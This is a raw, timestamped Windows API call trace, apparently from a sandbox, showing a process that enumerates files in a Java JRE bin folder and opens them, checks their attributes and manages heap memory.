[0091.237] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x62) returned 0x46a58 [0091.237] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x46a58, cchWideChar=49 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javaw.exe") returned 49 [0091.237] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javaw.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\javaw.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0091.237] GetFileType (hFile=0x360) returned 0x1 [0091.237] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46a58 | out: hHeap=0x20000) returned 1 [0091.237] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0091.238] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0091.238] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0091.238] CloseHandle (hObject=0x360) returned 1 [0091.238] AreFileApisANSI () returned 1 [0091.238] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 49 [0091.238] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x62) returned 0x460b8 [0091.238] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x460b8, cchWideChar=49 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javaw.exe") returned 49 [0091.238] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javaw.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\javaw.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0091.238] GetFileType (hFile=0x360) returned 0x1 [0091.238] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x460b8 | out: hHeap=0x20000) returned 1 [0091.238] CloseHandle (hObject=0x360) returned 1 [0091.239] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0091.239] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0091.239] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0091.239] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0091.239] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0091.239] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0091.239] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0091.239] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0091.239] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0091.239] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0091.239] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0091.239] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0091.239] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0091.239] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0091.239] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0091.239] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0091.239] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0091.239] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0091.239] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0091.239] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0091.239] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0091.239] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0091.239] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0091.239] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0091.239] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0091.239] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0091.239] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0091.239] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0091.239] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0091.239] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0091.239] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0091.239] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0091.239] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0091.239] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0091.239] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0091.240] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0091.240] AreFileApisANSI () returned 1 [0091.240] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 49 [0091.240] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x62) returned 0x46b38 [0091.240] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x46b38, cchWideChar=49 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javaw.exe") returned 49 [0091.240] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javaw.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\javaw.exe"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa747934d, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa747934d, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa747934d, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x32840)) returned 1 [0091.240] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46b38 | out: hHeap=0x20000) returned 1 [0091.240] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0091.240] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0091.240] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53520 | out: hHeap=0x20000) returned 1 [0091.240] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.240] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.240] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa747934d, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa747934d, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa747934d, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x4e040, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="javaws.exe", cAlternateFileName="")) returned 1 [0091.240] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0091.240] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0091.240] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0091.240] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0091.240] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0091.240] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0091.240] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0091.240] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0091.240] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0091.240] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35030 [0091.240] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0091.240] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35030 | out: hHeap=0x20000) returned 1 [0091.240] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0091.240] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35090 [0091.240] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0091.240] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35090 | out: hHeap=0x20000) returned 1 [0091.240] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0091.240] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d420 [0091.240] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0091.240] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x6a430 [0091.240] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d420 | out: hHeap=0x20000) returned 1 [0091.241] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0091.241] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0091.241] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a430 | out: hHeap=0x20000) returned 1 [0091.241] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.241] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.241] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.241] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.241] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0091.241] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0091.241] AreFileApisANSI () returned 1 [0091.241] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javaws.exe", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javaws.exe", lpUsedDefaultChar=0x0) returned 50 [0091.241] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0091.241] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.241] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.241] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0091.241] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0091.241] AreFileApisANSI () returned 1 [0091.241] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 50 [0091.241] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x64) returned 0x46438 [0091.241] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x46438, cchWideChar=50 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javaws.exe") returned 50 [0091.241] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javaws.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\javaws.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0091.242] GetFileType (hFile=0x360) returned 0x1 [0091.242] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46438 | out: hHeap=0x20000) returned 1 [0091.242] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0091.242] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0091.242] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0091.242] CloseHandle (hObject=0x360) returned 1 [0091.242] AreFileApisANSI () returned 1 [0091.242] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 50 [0091.242] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x64) returned 0x45e88 [0091.242] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x45e88, cchWideChar=50 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javaws.exe") returned 50 [0091.242] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javaws.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\javaws.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0091.243] GetFileType (hFile=0x360) returned 0x1 [0091.243] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x45e88 | out: hHeap=0x20000) returned 1 [0091.243] CloseHandle (hObject=0x360) returned 1 [0091.243] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0091.243] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0091.243] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0091.243] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0091.243] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0091.243] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0091.243] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0091.243] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0091.243] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0091.243] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0091.243] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0091.243] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0091.243] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0091.243] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0091.243] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0091.243] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0091.243] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0091.243] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0091.243] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0091.243] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0091.243] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0091.243] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0091.243] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0091.243] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0091.243] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0091.243] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0091.244] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0091.244] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0091.244] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0091.244] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0091.244] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0091.244] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0091.244] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0091.244] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0091.244] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0091.244] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0091.244] AreFileApisANSI () returned 1 [0091.244] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 50 [0091.244] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x64) returned 0x46b38 [0091.244] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x46b38, cchWideChar=50 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javaws.exe") returned 50 [0091.244] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javaws.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\javaws.exe"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa747934d, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa747934d, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa747934d, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x4e040)) returned 1 [0091.244] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46b38 | out: hHeap=0x20000) returned 1 [0091.244] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0091.244] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0091.244] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0091.244] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.244] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.244] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa747934d, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa747934d, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa747934d, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x7440, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="java_crw_demo.dll", cAlternateFileName="JAVA_C~1.DLL")) returned 1 [0091.244] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0091.244] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0091.244] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0091.244] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0091.244] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0091.244] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0091.244] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0091.244] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0091.244] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0091.244] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0091.244] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0091.244] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f10 [0091.245] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0091.245] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f10 | out: hHeap=0x20000) returned 1 [0091.245] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0091.245] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35130 [0091.245] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0091.245] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35130 | out: hHeap=0x20000) returned 1 [0091.245] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0091.245] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cfa8 [0091.245] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de00 [0091.245] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0091.245] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cfa8 | out: hHeap=0x20000) returned 1 [0091.245] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de00 | out: hHeap=0x20000) returned 1 [0091.245] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ec68 [0091.245] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0091.245] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.245] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.245] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.245] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.245] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ec68 | out: hHeap=0x20000) returned 1 [0091.245] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0091.245] AreFileApisANSI () returned 1 [0091.245] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java_crw_demo.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java_crw_demo.dll", lpUsedDefaultChar=0x0) returned 57 [0091.245] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0091.245] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 